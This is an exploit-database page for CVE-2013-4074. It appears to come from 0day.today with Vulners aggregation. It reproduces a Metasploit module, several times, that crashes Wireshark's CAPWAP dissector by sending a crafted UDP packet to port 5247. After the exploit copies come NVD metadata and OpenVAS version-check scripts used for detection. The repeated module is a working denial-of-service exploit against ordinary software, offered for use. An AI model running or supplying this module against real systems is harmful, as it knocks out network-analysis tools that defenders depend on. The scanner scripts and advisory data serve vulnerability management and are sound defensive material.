Wireshark CAPWAP Dissector - Denial of Service (msf)
2014-06-01T00:00:00
ID 1337DAY-ID-22309 Type zdt Reporter j0sm1 Modified 2014-06-01T00:00:00
Description
Exploit for multiple platform in category dos / poc
#
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Wireshark CAPWAP Dissector DoS',
'Description' => %q{
This module inject a malicious udp packet to crash Wireshark 1.8.0 to 1.8.7 and 1.6.0
to 1.6.15. The vulnerability exists in the capwap dissector which fails to handle an
incomplete packet.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Laurent Butti', # Discovery vulnerability
'j0sm1' # Auxiliary msf module
],
'References' =>
[
['CVE', '2013-4074'],
['OSVDB', '94091'],
['BID', '60500']
],
'DisclosureDate' => 'Apr 28 2014'))
# Protocol capwap needs port 5247 to trigger the dissector in wireshark
register_options([ Opt::RPORT(5247) ], self.class)
end
def run
connect_udp
# We send a packet incomplete to crash dissector
print_status("#{rhost}:#{rport} - Trying to crash wireshark capwap dissector ...")
# With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then
# the dissector crash
# You can see more information here: https://www.rfc-editor.org/rfc/rfc5415.txt
# F = 1 ; L = 0 ; W = 0 ; M = 1 ; K = 0 ; Flags = 000
buf = Rex::Text.rand_text(3) + "\x90" + Rex::Text.rand_text(15)
udp_sock.put(buf)
disconnect_udp
end
end
# 0day.today [2018-03-20] #
{"id": "1337DAY-ID-22309", "lastseen": "2018-03-20T09:23:11", "viewCount": 8, "bulletinFamily": "exploit", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "edition": 2, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2018-03-20T09:23:11", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-4074"]}, {"type": "exploitdb", "idList": ["EDB-ID:33556"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:126848"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/DOS/WIRESHARK/CAPWAP"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892709", "OPENVAS:1361412562310866933", "OPENVAS:803652", "OPENVAS:1361412562310867188", "OPENVAS:1361412562310803652", "OPENVAS:803653", "OPENVAS:866933", "OPENVAS:867188", "OPENVAS:1361412562310803653", "OPENVAS:892709"]}, {"type": "nessus", "idList": ["FEDORA_2013-17661.NASL", "SUSE_SU-2013-1276-1.NASL", "WIRESHARK_1_8_8.NASL", "FEDORA_2013-17627.NASL", "MANDRIVA_MDVSA-2013-172.NASL", "F5_BIGIP_SOL15868.NASL", "WIRESHARK_1_6_16.NASL", "SUSE_WIRESHARK-8659.NASL", "DEBIAN_DSA-2709.NASL", "SUSE_11_WIRESHARK-130711.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13095", "SECURITYVULNS:DOC:29462"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2709-1:755B4"]}, {"type": "f5", "idList": ["SOL15868", "F5:K15868"]}, {"type": "gentoo", "idList": ["GLSA-201308-05"]}], "modified": "2018-03-20T09:23:11", "rev": 2}, "vulnersScore": 5.4}, "type": "zdt", "sourceHref": "https://0day.today/exploit/22309", "description": "Exploit for multiple platform in category dos / poc", "title": "Wireshark CAPWAP Dissector - Denial of Service (msf)", "cvelist": ["CVE-2013-4074"], "sourceData": "#\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Auxiliary\r\n \r\n include Msf::Exploit::Remote::Udp\r\n include Msf::Auxiliary::Dos\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Wireshark CAPWAP Dissector DoS',\r\n 'Description' => %q{\r\n This module inject a malicious udp packet to crash Wireshark 1.8.0 to 1.8.7 and 1.6.0\r\n to 1.6.15. The vulnerability exists in the capwap dissector which fails to handle an\r\n incomplete packet.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Laurent Butti', # Discovery vulnerability\r\n 'j0sm1' # Auxiliary msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2013-4074'],\r\n ['OSVDB', '94091'],\r\n ['BID', '60500']\r\n ],\r\n 'DisclosureDate' => 'Apr 28 2014'))\r\n \r\n # Protocol capwap needs port 5247 to trigger the dissector in wireshark\r\n register_options([ Opt::RPORT(5247) ], self.class)\r\n end\r\n \r\n def run\r\n \r\n connect_udp\r\n \r\n # We send a packet incomplete to crash dissector\r\n print_status(\"#{rhost}:#{rport} - Trying to crash wireshark capwap dissector ...\")\r\n # With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then\r\n # the dissector crash\r\n # You can see more information here: https://www.rfc-editor.org/rfc/rfc5415.txt\r\n # F = 1 ; L = 0 ; W = 0 ; M = 1 ; K = 0 ; Flags = 000\r\n buf = Rex::Text.rand_text(3) + \"\\x90\" + Rex::Text.rand_text(15)\r\n udp_sock.put(buf)\r\n \r\n disconnect_udp\r\n \r\n end\r\nend\n\n# 0day.today [2018-03-20] #", "published": "2014-06-01T00:00:00", "references": [], "reporter": "j0sm1", "modified": "2014-06-01T00:00:00", "href": "https://0day.today/exploit/description/22309"}
{"cve": [{"lastseen": "2020-10-03T12:46:03", "description": "The dissect_capwap_data function in epan/dissectors/packet-capwap.c in the CAPWAP dissector in Wireshark 1.6.x before 1.6.16 and 1.8.x before 1.8.8 incorrectly uses a -1 data value to represent an error condition, which allows remote attackers to cause a denial of service (application crash) via a crafted packet.", "edition": 3, "cvss3": {}, "published": "2013-06-09T21:55:00", "title": "CVE-2013-4074", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4074"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:wireshark:wireshark:1.6.2", "cpe:/a:wireshark:wireshark:1.6.7", "cpe:/a:wireshark:wireshark:1.6.13", "cpe:/a:wireshark:wireshark:1.6.3", "cpe:/a:wireshark:wireshark:1.6.9", "cpe:/a:wireshark:wireshark:1.6.15", "cpe:/a:wireshark:wireshark:1.8.6", "cpe:/a:wireshark:wireshark:1.8.0", "cpe:/a:wireshark:wireshark:1.6.11", "cpe:/a:wireshark:wireshark:1.8.1", "cpe:/a:wireshark:wireshark:1.6.4", "cpe:/a:wireshark:wireshark:1.6.12", "cpe:/a:wireshark:wireshark:1.6.14", "cpe:/a:wireshark:wireshark:1.6.8", "cpe:/a:wireshark:wireshark:1.6.1", "cpe:/a:wireshark:wireshark:1.6.0", "cpe:/a:wireshark:wireshark:1.8.7", "cpe:/a:wireshark:wireshark:1.6.5", "cpe:/o:opensuse:opensuse:11.4", "cpe:/a:wireshark:wireshark:1.6.10", "cpe:/a:wireshark:wireshark:1.8.4", "cpe:/o:opensuse:opensuse:12.2", "cpe:/a:wireshark:wireshark:1.8.3", "cpe:/a:wireshark:wireshark:1.8.5", "cpe:/o:debian:debian_linux:7.0", "cpe:/a:wireshark:wireshark:1.8.2", "cpe:/a:wireshark:wireshark:1.6.6", "cpe:/o:opensuse:opensuse:12.3"], "id": "CVE-2013-4074", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4074", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:opensuse:opensuse:12.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.6.15:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:12.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.6.13:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.6.10:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.6.14:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:11.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.6.12:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:17:01", "description": "", "published": "2014-05-30T00:00:00", "type": "packetstorm", "title": "Wireshark CAPWAP Dissector Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-4074"], "modified": "2014-05-30T00:00:00", "id": "PACKETSTORM:126848", "href": "https://packetstormsecurity.com/files/126848/Wireshark-CAPWAP-Dissector-Denial-Of-Service.html", "sourceData": "`# \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Auxiliary \n \ninclude Msf::Exploit::Remote::Udp \ninclude Msf::Auxiliary::Dos \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Wireshark CAPWAP Dissector DoS', \n'Description' => %q{ \nThis module inject a malicious udp packet to crash Wireshark 1.8.0 to 1.8.7 and 1.6.0 \nto 1.6.15. The vulnerability exists in the capwap dissector which fails to handle an \nincomplete packet. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Laurent Butti', # Discovery vulnerability \n'j0sm1' # Auxiliary msf module \n], \n'References' => \n[ \n['CVE', '2013-4074'], \n['OSVDB', '94091'], \n['BID', '60500'] \n], \n'DisclosureDate' => 'Apr 28 2014')) \n \n# Protocol capwap needs port 5247 to trigger the dissector in wireshark \nregister_options([ Opt::RPORT(5247) ], self.class) \nend \n \ndef run \n \nconnect_udp \n \n# We send a packet incomplete to crash dissector \nprint_status(\"#{rhost}:#{rport} - Trying to crash wireshark capwap dissector ...\") \n# With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then \n# the dissector crash \n# You can see more information here: https://www.rfc-editor.org/rfc/rfc5415.txt \n# F = 1 ; L = 0 ; W = 0 ; M = 1 ; K = 0 ; Flags = 000 \nbuf = Rex::Text.rand_text(3) + \"\\x90\" + Rex::Text.rand_text(15) \nudp_sock.put(buf) \n \ndisconnect_udp \n \nend \nend \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126848/wiresharkcapwap-dos.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-03T19:25:54", "description": "Wireshark CAPWAP Dissector - Denial of Service (msf). CVE-2013-4074. Dos exploits for multiple platform", "published": "2014-05-28T00:00:00", "type": "exploitdb", "title": "Wireshark CAPWAP Dissector - Denial of Service msf", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-4074"], "modified": "2014-05-28T00:00:00", "id": "EDB-ID:33556", "href": "https://www.exploit-db.com/exploits/33556/", "sourceData": "#\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Auxiliary\r\n\r\n include Msf::Exploit::Remote::Udp\r\n include Msf::Auxiliary::Dos\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Wireshark CAPWAP Dissector DoS',\r\n 'Description' => %q{\r\n This module inject a malicious udp packet to crash Wireshark 1.8.0 to 1.8.7 and 1.6.0\r\n to 1.6.15. The vulnerability exists in the capwap dissector which fails to handle an\r\n incomplete packet.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Laurent Butti', # Discovery vulnerability\r\n 'j0sm1' # Auxiliary msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2013-4074'],\r\n ['OSVDB', '94091'],\r\n ['BID', '60500']\r\n ],\r\n 'DisclosureDate' => 'Apr 28 2014'))\r\n\r\n # Protocol capwap needs port 5247 to trigger the dissector in wireshark\r\n register_options([ Opt::RPORT(5247) ], self.class)\r\n end\r\n\r\n def run\r\n\r\n connect_udp\r\n\r\n # We send a packet incomplete to crash dissector\r\n print_status(\"#{rhost}:#{rport} - Trying to crash wireshark capwap dissector ...\")\r\n # With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then\r\n # the dissector crash\r\n # You can see more information here: https://www.rfc-editor.org/rfc/rfc5415.txt\r\n # F = 1 ; L = 0 ; W = 0 ; M = 1 ; K = 0 ; Flags = 000\r\n buf = Rex::Text.rand_text(3) + \"\\x90\" + Rex::Text.rand_text(15)\r\n udp_sock.put(buf)\r\n\r\n disconnect_udp\r\n\r\n end\r\nend", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/33556/"}], "metasploit": [{"lastseen": "2020-10-08T00:09:53", "description": "This module injects a malformed UDP packet to crash Wireshark and TShark 1.8.0 to 1.8.7, as well as 1.6.0 to 1.6.15. The vulnerability exists in the CAPWAP dissector which fails to handle a packet correctly when an incorrect length is given.\n", "published": "2014-05-24T17:53:10", "type": "metasploit", "title": "Wireshark CAPWAP Dissector DoS", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-4074"], "modified": "2020-10-02T20:00:37", "id": "MSF:AUXILIARY/DOS/WIRESHARK/CAPWAP", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Udp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Wireshark CAPWAP Dissector DoS',\n 'Description' => %q{\n This module injects a malformed UDP packet to crash Wireshark and TShark 1.8.0 to 1.8.7, as well\n as 1.6.0 to 1.6.15. The vulnerability exists in the CAPWAP dissector which fails to handle a\n packet correctly when an incorrect length is given.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Laurent Butti', # Discovery vulnerability\n 'j0sm1' # Auxiliary msf module\n ],\n 'References' =>\n [\n ['CVE', '2013-4074'],\n ['OSVDB', '94091'],\n ['BID', '60500']\n ],\n 'DisclosureDate' => '2014-04-28'))\n\n # Protocol capwap needs port 5247 to trigger the dissector in wireshark\n register_options([ Opt::RPORT(5247) ])\n end\n\n def run\n\n connect_udp\n\n # We send a packet incomplete to crash dissector\n print_status(\"#{rhost}:#{rport} - Trying to crash wireshark capwap dissector ...\")\n # With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then\n # the dissector crash\n # You can see more information here: https://www.rfc-editor.org/rfc/rfc5415.txt\n # F = 1 ; L = 0 ; W = 0 ; M = 1 ; K = 0 ; Flags = 000\n buf = Rex::Text.rand_text(3) + \"\\x90\" + Rex::Text.rand_text(15)\n udp_sock.put(buf)\n\n disconnect_udp\n\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/wireshark/capwap.rb"}], "openvas": [{"lastseen": "2017-07-02T21:11:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4081", "CVE-2013-4074"], "description": "This host is installed with Wireshark and is prone to multiple\n denial of service vulnerabilities.", "modified": "2017-05-15T00:00:00", "published": "2013-05-28T00:00:00", "id": "OPENVAS:803653", "href": "http://plugins.openvas.org/nasl.php?oid=803653", "type": "openvas", "title": "Wireshark Multiple DoS Vulnerabilities - June 13 (Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wireshark_mult_dos_vuln_jun13_macosx.nasl 6125 2017-05-15 09:03:42Z teissa $\n#\n# Wireshark Multiple DoS Vulnerabilities - June 13 (Mac OS X)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow remote attackers to cause denial of\n service via a crafted packet.\n Impact Level: Application\";\n\ntag_affected = \"Wireshark 1.6.x before 1.6.16, 1.8.x before 1.8.8 on Mac OS X\";\ntag_insight = \"- 'http_payload_subdissector' function in epan/dissectors/packet-http.c in\n HTTP dissector does not determine when to use a recursive approach.\n - 'dissect_capwap_data' function in epan/dissectors/packet-capwap.c in CAPWAP\n dissector incorrectly uses a -1 data value to represent an error condition.\";\ntag_solution = \"Upgrade to the Wireshark version 1.6.16 or 1.8.8 or later,\n For updates refer to http://www.wireshark.org/download\";\ntag_summary = \"This host is installed with Wireshark and is prone to multiple\n denial of service vulnerabilities.\";\n\nif(description)\n{\n script_id(803653);\n script_version(\"$Revision: 6125 $\");\n script_cve_id(\"CVE-2013-4081\",\"CVE-2013-4074\");\n script_bugtraq_id(60505, 60500);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-15 11:03:42 +0200 (Mon, 15 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-28 13:52:52 +0530 (Tue, 28 May 2013)\");\n script_name(\"Wireshark Multiple DoS Vulnerabilities - June 13 (Mac OS X)\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id/1028648\");\n script_xref(name : \"URL\" , value : \"http://www.wireshark.org/docs/relnotes/wireshark-1.8.8.html\");\n script_xref(name : \"URL\" , value : \"http://www.wireshark.org/docs/relnotes/wireshark-1.6.16.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_wireshark_detect_macosx.nasl\");\n script_mandatory_keys(\"Wireshark/MacOSX/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Variable Initialization\nsharkVer = \"\";\n\n## Get version from KB\nsharkVer = get_kb_item(\"Wireshark/MacOSX/Version\");\nif(sharkVer && sharkVer=~ \"^(1.6|1.8)\")\n{\n ## Check for vulnerable Wireshark versions\n if(version_in_range(version:sharkVer, test_version:\"1.6.0\", test_version2:\"1.6.15\")||\n version_in_range(version:sharkVer, test_version:\"1.8.0\", test_version2:\"1.8.7\"))\n {\n security_message(0);\n exit(0);\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4081", "CVE-2013-4074"], "description": "This host is installed with Wireshark and is prone to multiple\n denial of service vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2013-05-28T00:00:00", "id": "OPENVAS:1361412562310803653", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803653", "type": "openvas", "title": "Wireshark Multiple DoS Vulnerabilities - June 13 (Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wireshark_mult_dos_vuln_jun13_macosx.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# Wireshark Multiple DoS Vulnerabilities - June 13 (Mac OS X)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803653\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-4081\", \"CVE-2013-4074\");\n script_bugtraq_id(60505, 60500);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-28 13:52:52 +0530 (Tue, 28 May 2013)\");\n script_name(\"Wireshark Multiple DoS Vulnerabilities - June 13 (Mac OS X)\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id/1028648\");\n script_xref(name:\"URL\", value:\"http://www.wireshark.org/docs/relnotes/wireshark-1.8.8.html\");\n script_xref(name:\"URL\", value:\"http://www.wireshark.org/docs/relnotes/wireshark-1.6.16.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_wireshark_detect_macosx.nasl\");\n script_mandatory_keys(\"Wireshark/MacOSX/Version\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to cause denial of\n service via a crafted packet.\");\n script_tag(name:\"affected\", value:\"Wireshark 1.6.x before 1.6.16, 1.8.x before 1.8.8 on Mac OS X\");\n script_tag(name:\"insight\", value:\"- 'http_payload_subdissector' function in epan/dissectors/packet-http.c in\n HTTP dissector does not determine when to use a recursive approach.\n\n - 'dissect_capwap_data' function in epan/dissectors/packet-capwap.c in CAPWAP\n dissector incorrectly uses a -1 data value to represent an error condition.\");\n script_tag(name:\"solution\", value:\"Upgrade to the Wireshark version 1.6.16 or 1.8.8 or later.\");\n script_tag(name:\"summary\", value:\"This host is installed with Wireshark and is prone to multiple\n denial of service vulnerabilities.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.wireshark.org/download\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsharkVer = get_kb_item(\"Wireshark/MacOSX/Version\");\nif(sharkVer && sharkVer=~ \"^(1.6|1.8)\")\n{\n if(version_in_range(version:sharkVer, test_version:\"1.6.0\", test_version2:\"1.6.15\")||\n version_in_range(version:sharkVer, test_version:\"1.8.0\", test_version2:\"1.8.7\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4081", "CVE-2013-4074"], "description": "This host is installed with Wireshark and is prone to multiple\n denial of service vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2013-05-28T00:00:00", "id": "OPENVAS:1361412562310803652", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803652", "type": "openvas", "title": "Wireshark Multiple DoS Vulnerabilities - June 13 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wireshark_mult_dos_vuln_jun13_win.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# Wireshark Multiple DoS Vulnerabilities - June 13 (Windows)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803652\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-4081\", \"CVE-2013-4074\");\n script_bugtraq_id(60505, 60500);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-28 13:30:52 +0530 (Tue, 28 May 2013)\");\n script_name(\"Wireshark Multiple DoS Vulnerabilities - June 13 (Windows)\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id/1028648\");\n script_xref(name:\"URL\", value:\"http://www.wireshark.org/docs/relnotes/wireshark-1.8.8.html\");\n script_xref(name:\"URL\", value:\"http://www.wireshark.org/docs/relnotes/wireshark-1.6.16.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_wireshark_detect_win.nasl\");\n script_mandatory_keys(\"Wireshark/Win/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to cause denial of\n service via a crafted packet.\");\n script_tag(name:\"affected\", value:\"Wireshark 1.6.x before 1.6.16, 1.8.x before 1.8.8 on Windows\");\n script_tag(name:\"insight\", value:\"- 'http_payload_subdissector' function in epan/dissectors/packet-http.c in\n HTTP dissector does not determine when to use a recursive approach.\n\n - 'dissect_capwap_data' function in epan/dissectors/packet-capwap.c in CAPWAP\n dissector incorrectly uses a -1 data value to represent an error condition.\");\n script_tag(name:\"solution\", value:\"Upgrade to the Wireshark version 1.6.16 or 1.8.8 or later.\");\n script_tag(name:\"summary\", value:\"This host is installed with Wireshark and is prone to multiple\n denial of service vulnerabilities.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.wireshark.org/download\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsharkVer = get_kb_item(\"Wireshark/Win/Ver\");\n\nif(sharkVer && sharkVer=~ \"^(1.6|1.8)\")\n{\n if(version_in_range(version:sharkVer, test_version:\"1.6.0\", test_version2:\"1.6.15\")||\n version_in_range(version:sharkVer, test_version:\"1.8.0\", test_version2:\"1.8.7\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 5.0, "vector": 